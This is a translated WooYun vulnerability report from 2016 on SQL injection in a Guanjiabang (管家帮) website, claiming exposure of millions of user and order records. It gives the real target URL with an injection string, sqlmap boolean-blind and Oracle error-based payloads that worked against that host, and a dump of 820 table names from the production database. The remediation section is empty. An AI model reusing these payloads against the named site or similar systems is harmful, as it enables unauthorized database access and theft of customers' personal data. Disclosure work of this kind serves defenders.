
Vulnerability summary

Defect ID: wooyun-2016-0167320

Title: SQL injection in a Guanjiabang (管家帮) site (9 million order records / 7 million user records)

Vendor: Guanjiabang (管家帮)

Author: 路人甲

Submitted: 2016-01-05 09:34

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-01-05: Actively contacting the vendor and awaiting acknowledgement; details not disclosed publicly
2016-02-12: Vendor has proactively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

http://member.95081.com/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1* --

[Screenshot: 1.png]

[Screenshot: 2.png]


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://member.95081.com:80/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1 AND 8171=8171 --
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: http://member.95081.com:80/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1 AND 7724=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7724=7724) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) --
---
back-end DBMS: Oracle
Database: HAOGJ_V60
[820 tables]
+--------------------------------+
| ACCOUNT_TEMP |
| ACTIVITY_GROUP_AREA |
| ALL_ORDER_GUANJB |
| APP_KOUFEI |
| BABY_LOOKING_ANSWER |
| BABY_LOOKING_QUESTION |
| BABY_LOOKING_REMIND |
| BAK_MAQ_EDJ_SERVICE |
| BIOTOPE_BJ |
| BJ_MEMBER_ALL |
| BK_BILL_ALL |
| BK_HGJ_ORDER_FEE |
| BMS_ADMIN |
| BMS_BASIC_ITEM |
| BMS_CODE |
| BMS_CODE_FATHER |
| BMS_CODE_SON |
| BMS_ENTERPRISE_USER_AMOUNT |
| BMS_ENTERPRISE_USER_DAILY |
| BMS_ENTERPRISE_USER_MONTHLY |
| BMS_GROUP |
| BMS_HOME_USER_AMOUNT |
| BMS_HOME_USER_DAILY |
| BMS_HOME_USER_MONTHLY |
| BMS_INVESTIGATE_DAILY |
| BMS_INVESTIGATE_MONTHLY |
| BMS_LOG_LOGIN |
| BMS_MENU |
| BMS_OPERATE_LOG |
| BMS_ORDER_DAILY |
| BMS_ORDER_LOG |
| BMS_ORDER_MONTHLY |
| BMS_ORDER_STATE_DAILY |
| BMS_ORDER_STATE_MONTHLY |
| BMS_REG_LOG |
| BMS_ROLE |
| BMS_ROLE_MENU |
| BUS_COMPANY |
| BUS_DRIVER |
| BUS_LOGIN |
| BUS_ORDER |
| BUS_PATH |
| BUS_PRICE |
| BUS_USER |
| CALL_ANSWER |
| CALL_LOG |
| CALL_OUT_LOG |
| CALL_QUESTION |
| CALL_QUESTION_VAL |
| CALL_TASK |
| CALL_TASK_QUESTION |
| CARD_BAT |
| CARD_CHONGZHI |
| CARD_INFO |
| CARD_INFO_BAT_QIYF |
| CARD_INFO_NEW |
| CARD_INFO_NEWBAK |
| CARD_INFO_OLDBAK |
| CARD_INFO_QIXIAOF |
| CARD_INFO_QIYF |
| CARD_USED |
| CELLID |
| CHAINED_ROWS |
| CITY_BILL_SUM |
| CITY_BOUNDS |
| CITY_GIFT |
| CITY_ORDER |
| CITY_ORDER_NUM |
| CITY_RATIO |
| CLICK_DRIVER_MOIBLE |
| COMMENTS_INFO |
| COMMON_TEACHER_INFO |
| CORP_SUBPHONE |
| CORP_VALIDATE |
| CUPON_USED |
| CUSTOMER_INFO |
| CUSTOMER_ORDER_ADDERSS |
| DD2 |
| DEPT_EDJ_DRIVER |
| DEST_ORDER |
| DIALOGUE_VIDEO_INFO |
| DJB_CALL_LOG |
| DKH_GOODS |
| DKH_GOODS_BK |
| DKH_GOODS_CLASS |
| DKH_ORDER_DETAIL |
| DKH_ORDER_REQUIER |
| DRIVER_JOIN |
| DRIVINGCHARGES |
| DWB_USER |
| EDJ_ACCOUNT |
| EDJ_ACCOUNT_DETAIL |
| EDJ_AREA |
| EDJ_BILL |
| EDJ_BLACK_LIST |
| EDJ_CALL_LOG |
| EDJ_CHARGE_STANDARD |
| EDJ_CLIENT_CALL_LOG |
| EDJ_COLLECT |
| EDJ_COMMENT |
| EDJ_CUSTOMER |
| EDJ_DRIVER |
| EDJ_DRIVER20141218 |
| EDJ_DRIVER20150407 |
| EDJ_DRIVER20150817 |
| EDJ_DRIVER20150825 |
| EDJ_DRIVERCALLBACK |
| EDJ_DRIVER_EMOTTE |
| EDJ_DRIVER_EMT |
| EDJ_DRIVER_LOG |
| EDJ_DRIVER_PATH |
| EDJ_DRIVER_PEOPLE |
| EDJ_DRIVER_RECORD |
| EDJ_DRIVER_YM |
| EDJ_DWB_USER |
| EDJ_ERROR_LOG |
| EDJ_ESTAT_SERVICE |
| EDJ_HOTELS |
| EDJ_INIT_LOG |
| EDJ_LOCATE_ERROR_LOG |
| EDJ_MANAGER |
| EDJ_MATCH |
| EDJ_NOTICE |
| EDJ_NOTICE_TYPE |
| EDJ_ORDER_SERVICE_EMT |
| EDJ_PRICE |
| EDJ_SERVER_LOG |
| EDJ_SERVICE |
| EDJ_SERVICE_EMOTTE |
| EDJ_SERVICE_EMOTTE_INFO |
| EDJ_SERVICE_EMT |
| EDJ_SERVICE_EMT_INFO_BASE |
| EDJ_SERVICE_ORDER |
| EDJ_SERVICE_ORDER_ALL |
| EDJ_SERVICE_ORDER_EMT |
| EDJ_SERVICE_STATISTICS |
| EDJ_SERVICE_YM |
| EDJ_SERVICE_YM_NEWBAK |
| EDJ_SPEC_PHONE |
| EDJ_USER_LOG |
| EDJ_USER_STATUS |
| EDJ_USER_SUGGEST |
| EDJ_VIP_DIRECTCALL_RECORDS |
| EMAIL_SUBSCRIPTION |
| EMOTE_ORDER_INFO_BK1 |
| EMOTTE_BALANCE |
| EMOTTE_DEST_FEE |
| EMOTTE_FLOW |
| EMOTTE_FLOW1 |
| EMOTTE_FLOW2 |
| EMOTTE_FLOW_INIT |
| EMOTTE_FLOW_INIT1 |
| EMOTTE_GJB_ORDER1 |
| EMOTTE_GJB_ORDER2 |
| EMOTTE_INCOME |
| EMOTTE_INCOME_FLOW |
| EMOTTE_INCOME_INIT |
| EMOTTE_INDEX_DATA |
| EMOTTE_INDEX_SQL |
| EMOTTE_MEMBER_INFO |
| EMOTTE_MEMBER_REPLACE |
| EMOTTE_MEMBER_REPLACE1 |
| EMOTTE_MEMBER_REPLACE2 |
| EMOTTE_ORDER_FEE_INFO |
| EMOTTE_ORDER_INFO |
| EMOTTE_PRICE |
| EMOTTE_PRICE1 |
| EMOTTE_TEST_USER |
| EMOTTE_USER |
| EMOTTE_USER_INFO |
| EMOTTE_USER_INFO_ALL |
| EMOTTE_USER_TP |
| EMS_ACCESS_CONFIG |
| EMS_ACCESS_LOG |
| EMS_ADMIN_LOG |
| EMS_ATTRIBUTE |
| EMS_BOOKING_GOODS |
| EMS_BRAND |
| EMS_CART |
| EMS_CATEGORY |
| EMS_CATEGORY_ZZ |
| EMS_CAT_RECOMMEND |
| EMS_COLLECT_GOODS |
| EMS_COMMENT |
| EMS_GOODS |
| EMS_GOODS_ATTR_RELATION |
| EMS_GOODS_CAT_RELATION |
| EMS_GOODS_GROUP |
| EMS_GOODS_LINK |
| EMS_GOODS_PIC |
| EMS_GOODS_TYPE |
| EMS_INVOICE |
| EMS_NAV |
| EMS_ORDER_GOODS |
| EMS_ORDER_INFO |
| EMS_ORDER_LOG |
| EMS_PAYMENT |
| EMS_PAY_LOG |
| EMS_RETURNS_GOOD |
| EMS_SEARCH_LOG |
| EMS_SHIPPING |
| EMS_SHIPPING_GOODS |
| EMS_SHIPPING_LOG |
| EMS_USER_ADDRESS |
| EM_DEST |
| EPUB_AD_BASE |
| EPUB_AD_ORDER |
| ESPREAD_ACCOUNT |
| ESPREAD_CONTRACT_BATCH_PRICE |
| ESPREAD_CONTRACT_PRICE |
| ESPREAD_ORDER_FEE |
| ESPREAD_PAY_HISTORY |
| ESPREAD_TOTAL_ORDER_FEE_DAY |
| ESPREAD_TOTAL_ORDER_FEE_MONTH |
| ESPREAD_USER |
| ESTATE_ORDER_OPERATION_MONTH |
| ESTAT_ACCOUNT_MONTH |
| ESTAT_APPLY_DAY |
| ESTAT_APPLY_MONTH |
| ESTAT_CALLKIND_DAY |
| ESTAT_CALLKIND_MONTH |
| ESTAT_CALLORDER_REPORT |
| ESTAT_CONVENIENCE_DAY |
| ESTAT_CONVENIENCE_MONTH |
| ESTAT_CORP_SERVICE |
| ESTAT_HX_ORDER |
| ESTAT_MENU_STAT |
| ESTAT_OPERATOR_LOG_DAY |
| ESTAT_OPERATOR_LOG_MONTH |
| ESTAT_OPERATOR_ORDER_DAY |
| ESTAT_OPERATOR_ORDER_MONTH |
| ESTAT_ORDERFLOW_DAY |
| ESTAT_ORDERFLOW_MONTH |
| ESTAT_ORDERSATIS_DAY |
| ESTAT_ORDERSATIS_MONTH |
| ESTAT_ORDERSRC_ALL |
| ESTAT_ORDERSRC_ALL_DB |
| ESTAT_ORDERSRC_ALL_EXTEND |
| ESTAT_ORDERSRC_ALL_OLD |
| ESTAT_ORDERSRC_DAY |
| ESTAT_ORDERSRC_MONTH |
| ESTAT_ORDER_ADD_DAILY |
| ESTAT_ORDER_ADD_DAILYBAK |
| ESTAT_ORDER_ADD_MONTHLY |
| ESTAT_ORDER_FEE_DAY |
| ESTAT_ORDER_FEE_MONTH |
| ESTAT_ORDER_MATCH_FAIL_DAY |
| ESTAT_ORDER_MATCH_FAIL_MONTH |
| ESTAT_ORDER_OPERATION_DAY |
| ESTAT_ORDER_OPERATION_MONTH |
| ESTAT_ORDER_SERV_DAY |
| ESTAT_ORDER_SERV_MONTH |
| ESTAT_REVORDER_DAY |
| ESTAT_REVORDER_MONTH |
| ESTAT_SERVICE |
| ESTAT_TOTAL |
| ESTAT_USER |
| ESTAT_USER_GROUP |
| ESTAT_USER_MENU |
| ESTAT_USER_ROLE |
| EXPERT_AND_USER |
| FIRST_ORDER |
| FRIENDLY_LINK_MANA |
| GJBSERVICE |
| GJB_GOOD |
| GJB_GOOD_ALBUM |
| GJB_GOOD_BEIJ |
| GJB_SOUGOU_MAP |
| GPS_EQUIP_INFO |
| GPS_USER_INFO |
| GROUP_BANK_MIDDLE_DETAIL |
| GROUP_INCOME_BANK_FLOW |
| GUEST_INFO |
| HAOGJ_ORDER_ALL_DATA |
| HEADER_BANNER_CITY |
| HEADER_BANNER_CLASS |
| HGJ_ACCOUNT_LOG |
| HGJ_ACTIVE_MONTHER |
| HGJ_ACTIVE_ONE_HOUR |
| HGJ_ADVER_ORDER |
| HGJ_ADVICE |
| HGJ_ALBUM |
| HGJ_APPLY_NEED |
| HGJ_APP_BAK |
| HGJ_APP_BL |
| HGJ_AWARD_HISTORY |
| HGJ_BACK_HISTORY |
| HGJ_BI1L |
| HGJ_BIL1 |
| HGJ_BILL |
| HGJ_BILL_APP |
| HGJ_BILL_C1 |
| HGJ_BILL_G |
| HGJ_BILL_INFO |
| HGJ_BILL_L |
| HGJ_BILL_TMP |
| HGJ_BLACKLIST_LOG |
| HGJ_BROADCAST |
| HGJ_CALLOUT_NEW |
| HGJ_CALLOUT_PROJECT |
| HGJ_CALL_DETAIL |
| HGJ_CALL_LOG |
| HGJ_CALL_TYPE |
| HGJ_CANCEL_ORDER |
| HGJ_CHAT_MEMBER |
| HGJ_CHECKID_LOG |
| HGJ_CITY_HOURPRICE |
| HGJ_CLASS |
| HGJ_CLASS_BJ |
| HGJ_CLASS_BK |
| HGJ_CLASS_BK150105 |
| HGJ_CLASS_BK150106 |
| HGJ_CLASS_BK150106BK |
| HGJ_CLASS_BK150106BKZ |
| HGJ_CLASS_BK150106LUZHANHUI |
| HGJ_COMPLAINT |
| HGJ_CONTRACT |
| HGJ_CONTRACT_BATCH_PRICE |
| HGJ_CONTRACT_PRICE |
| HGJ_CONVENIENCE |
| HGJ_COOPERATION |
| HGJ_COOP_DISCOUNT |
| HGJ_CORP_AD_IMAGE |
| HGJ_CORP_ALBUM |
| HGJ_CORP_COMMENT |
| HGJ_CORP_CREDIT |
| HGJ_CORP_EMPLOYEE |
| HGJ_CORP_ITEM_FEE |
| HGJ_CORP_PIC |
| HGJ_CORP_RECOMMAND |
| HGJ_COUNT |
| HGJ_CUSTOMER |
| HGJ_DIFF |
| HGJ_DIVERT |
| HGJ_DOMAIN |
| HGJ_EMPLOYEE_BASE |
| HGJ_EMPLOYEE_HISTORY |
| HGJ_EMP_COMMENT |
| HGJ_EVAL_DETAIL |
| HGJ_EVAL_HISTORY |
| HGJ_EVAL_QUESTION |
| HGJ_EXPONENT |
| HGJ_FAIL_ORDER_SHOW |
| HGJ_GIFT |
| HGJ_GOODS_CREDIT |
| HGJ_GROUD_SELLER |
| HGJ_HEADER_BANNER |
| HGJ_HOME_USER |
| HGJ_HOT_LINE |
| HGJ_INCOME |
| HGJ_INCOME1 |
| HGJ_INTEGRAL_INFO |
| HGJ_INTEGRAL_USER |
| HGJ_INVESTIGATE |
| HGJ_INVITE_CORP |
| HGJ_INVITE_EMPLOYEE |
| HGJ_JOIN_CORP |
| HGJ_KEYWORDS_LOG |
| HGJ_KEYWORDS_MANAGE |
| HGJ_KEY_WORD |
| HGJ_KIND_REPORT |
| HGJ_LEFT_ORDER_LOG |
| HGJ_MAP_INFO |
| HGJ_MEMBERPAY_LOG |
| HGJ_MEMBER_90 |
| HGJ_MEMBER_ACCOUNT |
| HGJ_MEMBER_ACCOUNT20141212 |
| HGJ_MEMBER_BASE |
| HGJ_MEMBER_BASE_ZHANGZ |
| HGJ_MEMBER_CODE |
| HGJ_MEMBER_COMMENT |
| HGJ_MEMBER_EXTEND |
| HGJ_MEMBER_INDEX_LEVEL |
| HGJ_MEMBER_LOG |
| HGJ_MEMBER_NUM |
| HGJ_MEMBER_OPEN |
| HGJ_MEMBER_ORDER |
| HGJ_MEMBER_PARENT |
| HGJ_MEMBER_PAY |
| HGJ_MEMBER_QUOTA |
| HGJ_MEMBER_REPORT |
| HGJ_MEMBER_SERVICE |
| HGJ_MESSAGES_LOG |
| HGJ_MESSAGE_LINK |
| HGJ_MESSAGE_SEND |
| HGJ_NEWS |
| HGJ_OABLL |
| HGJ_OA_BL |
| HGJ_ORDER_ALL |
| HGJ_ORDER_BASE |
| HGJ_ORDER_BASE0824 |
| HGJ_ORDER_BASE_BK |
| HGJ_ORDER_CHANNEL |
| HGJ_ORDER_DEST |
| HGJ_ORDER_EXTEND |
| HGJ_ORDER_FEE_DETAIL |
| HGJ_ORDER_FEE_DETAILBK15010112 |
| HGJ_ORDER_FEE_HISTORY |
| HGJ_ORDER_FEE_INFO |
| HGJ_ORDER_INFO |
| HGJ_ORDER_MATCH |
| HGJ_ORDER_MATCH_TEST |
| HGJ_ORDER_MEMBER |
| HGJ_ORDER_MODEL |
| HGJ_ORDER_OVER_TIME |
| HGJ_ORDER_SERVICE |
| HGJ_ORDER_XML |
| HGJ_ORDER_XMLINFO |
| HGJ_ORDER_XML_13 |
| HGJ_ORDER_XML_LJQ |
| HGJ_OTHER_SERVICE |
| HGJ_PERSONAL_ACCOUNT |
| HGJ_PUBLISH_ITEM |
| HGJ_PUBLISH_ITEMANSWER |
| HGJ_PUBLISH_TEMPLATE |
| HGJ_PUB_INFO |
| HGJ_PUB_INFO_ITEM |
| HGJ_PUB_TOP_LOG |
| HGJ_QUESTIONARY_ANSWER |
| HGJ_QUESTIONARY_QUESTION |
| HGJ_QUESTIONARY_SHEET |
| HGJ_REALINFO |
| HGJ_REGION |
| HGJ_REGION_TREE |
| HGJ_SCORERECORD |
| HGJ_SERVICE_PERSONNEL |
| HGJ_SHORT_URL |
| HGJ_SMS_SEND |
| HGJ_SUPPORT_INFO |
| HGJ_TEMP_PRICE |
| HGJ_TJ |
| HGJ_USER |
| HGJ_USER_CORPSET |
| HGJ_USER_CREDIT |
| HGJ_USER_CREDIT_HISTORY |
| HGJ_VIP |
| HGJ_VIP_CARD |
| HGJ_VOTER |
| HGJ_VOTERECORD |
| HGJ_WEB_FEE_DETAIL |
| HGJ_WEB_ORDER |
| HGJ_WEB_ORDER_BB |
| HGJ_WWW_ORDER |
| HOMEORDERGROUP |
| HOME_COMPLAINT |
| HOME_ORDERSHOW |
| HOME_PHOTO |
| HOME_REMARK |
| HOME_REMARK_BY_SERVICE |
| HOME_SCORES |
| HOME_SCORE_CATALOG |
| HOT_KEY_WORD |
| HX_AGENT_CALL_DETAIL_BEIJING |
| HX_AGENT_CALL_DETAIL_CITY |
| HX_AGENT_CALL_DETAIL_EXTEND |
| INCOME_TOTAL |
| JZ |
| JZB_COMPANY |
| JZB_SERVICE_PERSONNEL |
| JZB_SERVICE_PRICE |
| JZB_TEMP |
| JZB_TEMP1 |
| JZB_TEMP2 |
| JZ_STORES |
| J_BILL_INFO |
| J_BILL_INFO_LANT |
| J_BILL_INFO_LANT123 |
| J_BILL_LOG |
| J_BILL_RECORD |
| J_BILL_RECORD_LANT |
| J_CHECK_PRODUCT |
| J_CHECK_PRODUCT_LANT |
| J_CHECK_STORE |
| J_CHECK_STORE_LANT |
| J_ORDER_INFO |
| J_ORDER_INFO_LANT |
| J_PRODUCT_INFO |
| J_PRODUCT_INFO_LANT |
| LBS_DATA |
| LBS_DATA1 |
| LBS_DATA2 |
| LBS_DATA_CDMA |
| LBS_ERROR_DATA |
| LBS_HISTORY |
| LBS_STATUS |
| LIYT_TEST_USER |
| MANAGZINE_MANAGEMENT |
| MEMBER_REP |
| MEMBER_ZF |
| MEMBER_ZF1 |
| MLOG$_TEST_USER |
| MMS_USER_TEST |
| MOBILE_CLIENT |
| MOVE_CAR |
| MOVE_CAR_HISTORY |
| MOVE_CAR_PERSON |
| MOVE_PERSON |
| NEWS_TYPE |
| NHXX_DISTRIBUTION_AREA |
| NHXX_GOODS |
| NHXX_ORDER_REQUIRE |
| NHXX_TASK |
| OK_DATA_INFO |
| OPERATOR_RECORD |
| ORDER_AND_CONFIRM |
| ORDER_MAP |
| ORDER_USER |
| ORDER_USER2 |
| ORDER_USER3 |
| PAY_DATA |
| PAY_ORDER |
| PAY_ORDER_V2 |
| PAY_PLATFORM |
| PAY_REGISTER |
| PAY_ZHIFUBAO |
| PERSON_PERCENT_CITY |
| PERSON_PERCENT_COUNTY |
| PHONE_NAME |
| PINGJIA_ZUHE |
| PINGYIN_CODE_NAME |
| PINYIN_COD_NAME |
| PLSQL_PROFILER_DATA |
| PLSQL_PROFILER_RUNS |
| PLSQL_PROFILER_UNITS |
| POLICY_LAW |
| PUBLISH_COMPLAINT_MANA |
| PUBLISH_MESSAGE |
| RESIDENTS_MESSAGE_BOARD |
| RUPD$_TEST_USER |
| SA |
| SELECT_USER_RECORD |
| SEND_MESSAGE_INFO |
| SERVICE_PERSON_REGIST |
| SHOW_WEB_PERSONNEL |
| SJB_EVENTS |
| SJB_GUESS |
| SMS_CLASS_COURSE |
| SMS_CLASS_MANAGER |
| SMS_COURSE_MANAGER |
| SMS_LABOR_DISPATCH |
| SMS_ORDER_TRAIN |
| SMS_STUDENT_BASE |
| SMS_STUDENT_CLASS |
| SMS_TEA_MANAGER |
| SMS_TRAIN_AUDIT |
| SP_MOBILE |
| SS1 |
| STATISTICSCLIENTPERSON20130411 |
| STATISTICS_CLIENT |
| STATISTICS_CLIENT1 |
| STATISTICS_CLIENT2 |
| STATISTICS_CLIENT_LILANG |
| STATISTICS_CLIENT_OTHER |
| STATISTICS_CLIENT_PERSON |
| STATISTICS_CLIENT_PERSON_DATA |
| STATISTICS_CLIENT_PERSON_IDG |
| STATISTICS_CLIENT_PERSON_INFO |
| STATISTICS_CLIENT_PER_INFO_HS |
| STATISTICS_CLIENT_P_I_0427 |
| STATISTICS_INCOME_DETAIL |
| STATISTIC_INCOME_TOTAL |
| STAT_IN_DETAILWWWWW |
| STAT_MEMBER_CITY |
| STAT_MEMBER_CITY_M |
| STAT_ORDER_CITY |
| STAT_SANTY |
| STAT_USER_CITY |
| STAT_USER_CITY_M |
| ST_BILL_ORDER_DAILY |
| ST_BILL_ORDER_MONTHLY |
| ST_BILL_STATISTIC_DAILY |
| ST_BILL_STATISTIC_MONTHLY |
| ST_CALLOUT_MEMBER_DAILY |
| ST_CALLOUT_MEMBER_MONTHLY |
| ST_CALLOUT_STATUS_DAILY |
| ST_CALLOUT_STATUS_MONTHLY |
| ST_CORP_ORDER_DAILY |
| ST_CORP_ORDER_MONTHLY |
| ST_FINISH_ORDER_DAILY |
| ST_FINISH_ORDER_MONTHLY |
| ST_HGJ_EMPLOYEE_ORDER_DAY |
| ST_HGJ_EMPLOYEE_ORDER_MONTH |
| ST_HGJ_MEMBER_ORDER_DAY |
| ST_HGJ_MEMBER_ORDER_MONTH |
| ST_HJ_ORDER_ADD_DAILY |
| ST_HJ_ORDER_ADD_MONTHLY |
| ST_HJ_ORDER_FEEDBACK_DAILY |
| ST_HJ_ORDER_FEEDBACK_MONTHLY |
| ST_HJ_ORDER_FLOW_DAILY |
| ST_HJ_ORDER_FLOW_MONTHLY |
| ST_HJ_ORDER_INV_DAILY |
| ST_HJ_ORDER_INV_MONTHLY |
| ST_HJ_ORDER_MATCH_FAIL_DAILY |
| ST_HJ_ORDER_MATCH_FAIL_MONTHLY |
| ST_HJ_ORDER_OPERATION_DAILY |
| ST_HJ_ORDER_OPERATION_MONTHLY |
| ST_HJ_ORDER_OPERATOR_DAILY |
| ST_HJ_ORDER_OPERATOR_MONTHLY |
| ST_HJ_ORDER_REVOKE_DAILY |
| ST_HJ_ORDER_REVOKE_MONTHLY |
| ST_HJ_O_FEEDBACK_CORP_DAILY |
| ST_HJ_O_FEEDBACK_CORP_MONTHLY |
| ST_HX_MEMBER_BASE_NEW_DAILY |
| ST_HX_MEMBER_BASE_NEW_MONTHLY |
| ST_HX_MEMBER_BASE_ORDER |
| ST_HX_MEMBER_BASE_SUM |
| ST_HX_MEMBER_MANAGER_DAILY |
| ST_HX_MEMBER_MANAGER_MONTHLY |
| ST_ORDER_LOG_DAILY |
| ST_ORDER_LOG_MONTHLY |
| SYS_EXPORT_SCHEMA_01 |
| SYS_REMARKE |
| T1 |
| T1031_ADDRESS |
| T1031_DEST_ORDER |
| T1031_FEE_INFO |
| T1031_ORDER_BASE |
| T1031_ORDER_BASE1 |
| T1031_ORDER_BASE2 |
| T1031_ORDER_BASE3 |
| T1031_ORDER_BASE4 |
| T1031_ORDER_BASE5 |
| T1031_ORDER_BASE6 |
| T1031_ORDER_BASE7 |
| T1031_ORDER_BASE8 |
| T1031_ORDER_BASE_1117 |
| T1031_ORDER_DEMO |
| T1031_ORDER_TMP |
| T1031_ORDER_TMP1 |
| T1031_TMP |
| T1031_TMP1 |
| T1031_TMP_ORDER |
| T1031_USER |
| T1031_USER_INFO |
| T1031_USER_INFO1 |
| T1031_USER_MAP |
| T1031_USER_MODEL |
| T1031_USER_NOADDRESS |
| T1031_USER_TMP |
| T1031_USER_TMP1 |
| TAXI_SERVICE |
| TEMP_123 |
| TEMP_67 |
| TEMP_CALL |
| TEMP_DELREMARK_BAK |
| TEMP_EDJ_FEE |
| TEMP_EDJ_ORDER_SERVICE_EMT |
| TEMP_EDJ_SERVICE_ID |
| TEMP_EDJ_SERVICE_MOB_DIB |
| TEMP_EDJ_SERVICE_TEMP |
| TEMP_EDJ_SERVICE_TEMP_TEMP |
| TEMP_EMOTTE_USER_DIB |
| TEMP_HGJ_CLASS_COOPID |
| TEMP_HGJ_MEMBER_ACCOUNT |
| TEMP_HGJ_ORDER |
| TEMP_HGJ_WEB_ORDER |
| TEMP_ID |
| TEMP_MOB2014 |
| TEMP_MOB2014_2014 |
| TEMP_MOBILE_CITY |
| TEMP_MOB_1 |
| TEMP_MOB_1_1 |
| TEMP_MOB_RN |
| TEMP_MYID |
| TEMP_ORDER_ID |
| TEMP_PJ |
| TEMP_REMARK |
| TEMP_SCP |
| TEMP_SERMOB |
| TEMP_SERVICE |
| TEMP_SERVICE0519 |
| TEMP_SERVICE_USER |
| TEMP_SER_ID |
| TEMP_TEMP |
| TEMP_TTT |
| TEMP_WORKINFO |
| TEMP_XY |
| TEST111 |
| TESTLIYUNTAO |
| TEST_A |
| TEST_A1 |
| TEST_B |
| TEST_BILL_2013 |
| TEST_BZ |
| TEST_CITY |
| TEST_CITY_PHONE |
| TEST_CITY_PHONE1 |
| TEST_CORP |
| TEST_CORP1 |
| TEST_CORP2 |
| TEST_CORP3 |
| TEST_EDIT_MEMBER |
| TEST_G1 |
| TEST_MEMBER |
| TEST_MEMBER1 |
| TEST_MEMBER_G |
| TEST_NAME_1031 |
| TEST_O1 |
| TEST_O2 |
| TEST_ORDER_ALL |
| TEST_P |
| TEST_STY |
| TEST_STY1 |
| TEST_STY2 |
| TEST_ST_ORDER |
| TEST_ST_USER |
| TEST_ST_USER1 |
| TEST_ST_USER2 |
| TEST_T1 |
| TEST_TMP |
| TEST_U1 |
| TEST_U2 |
| TEST_U3 |
| TEST_U4 |
| TEST_USER |
| TEST_USER_SH |
| TMP_CHECK_UN |
| TMP_FEE_DETAIL |
| TMP_ID |
| TMP_IMEI |
| TMP_MEMBER |
| TMP_REMARK_CONTENT |
| TMP_TB |
| TMP_USER_COUNT |
| TRAINNING_CORP |
| TRAINNING_JOBS_TYPE |
| TRAINNING_SEMESTER_STUDENTS |
| TRAINNING_STUDENT_ADMIN |
| TRAINNING_TERMERS |
| TRAIN_VIDEO_MANA |
| TS_INFO_NEWS |
| T_BMS_LOG_ACT |
| T_BMS_LOG_IN |
| T_COMPAY_NUMBER_XDP |
| T_CUSTOMER_BASE_INFO |
| T_EDJ_SERVICE |
| T_HOME_REMARK_SERVICE |
| T_HOME_SCORES |
| T_PAY_DATA |
| T_REMARK |
| USER_AND_BIAO |
| USER_AWARD_RECORD |
| USER_COMPLAINT |
| USER_INFORM_INFO |
| USER_REPORT |
| USER_SURVEY |
| UTIL_BILL |
| UTIL_BILL_ORDER_COUNT |
| UTIL_CITY |
| UTIL_KIND |
| UTIL_KIND1 |
| UTIL_MEMBER |
| UTIL_MEMBER_BASE |
| UTIL_PRICE |
| UTIL_STAT_FEE |
| UTIL_STAT_ORDER |
| UTIL_STAT_ORDERALL |
| UTIL_SUCC_USER |
| UTIL_USER |
| UTIL_USER_LOG |
| UTIL_USER_LOG_ALL |
| UTIL_USER_LOG_NEW |
| VIEW_INVESTIGATE_REAL |
| VIP_PAY_RECORD |
| V_HOUSE_WORKER_CONFIG |
| WEIXIN_CLEAR_LOG |
| WEIXIN_GUEST |
| WEIXIN_PLAYER |
| WIN_QIAN_DAO |
| WX_ACTIVITY |
| WX_ACTIVITY_USER |
| WX_ACTIVTY_COUPON |
| WX_CROWDFUNDING_PART |
| WX_CROWDFUNDING_ROUND |
| WX_CUSTOM_SERVICE |
| WX_KANJIA |
| WX_MES |
| WX_USER |
| YCDJ_MEMBER |
| YCDJ_MEMBER_USER |
| YONGHU_ADDRESS_WDM |
| YONGHU_WDM |
| YOYO |
| ZL_ALARM |
| ZL_ALARM_TEMP |
| ZL_APPLY_SUBSIDY_INFO |
| ZL_BATCARD |
| ZL_BLOOD_OXYGEN |
| ZL_BLOOD_PRESSURE |
| ZL_BLOOD_SUGAR |
| ZL_BUSINESS_INFO |
| ZL_BUSINESS_RECORD |
| ZL_CAMERA_INFO |
| ZL_CARD |
| ZL_CASH |
| ZL_EAR_TEMPERATURE |
| ZL_ELECTROCARDIOGRAM |
| ZL_FAMILY_SAFETY_INFO |
| ZL_FAVORABLE_EXERCISE_INFO |
| ZL_HEALTH |
| ZL_HEALTH_DISPOSE |
| ZL_HEALTH_EAR |
| ZL_HEALTH_HEARTRATE |
| ZL_HEALTH_MANAGER |
| ZL_HEALTH_OXYGEN |
| ZL_HEALTH_SUGAR |
| ZL_HOUSEKEEPING_INFO |
| ZL_LOCATION_INFO |
| ZL_MEDICAL_TREATMENT_INFO |
| ZL_OLDUSER |
| ZL_PERSEONINFO |
| ZL_PHONE_BUSINESS |
| ZL_PHYSICAL_EXAMINATION |
| ZL_SERVICE_HISTORY |
| ZL_SNS |
| ZL_USER |
| ZL_VOLLUNTER |
| ZYW_CUSTOMER_INFO |
| ZY_ADD_VIP |
| ZY_PHONE_DITUI |
+--------------------------------+

[Screenshot: 3.png]

Proof of vulnerability:

Remediation:

Copyright notice: when reproducing, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined

Vulnerability Rank: 15 (WooYun rating)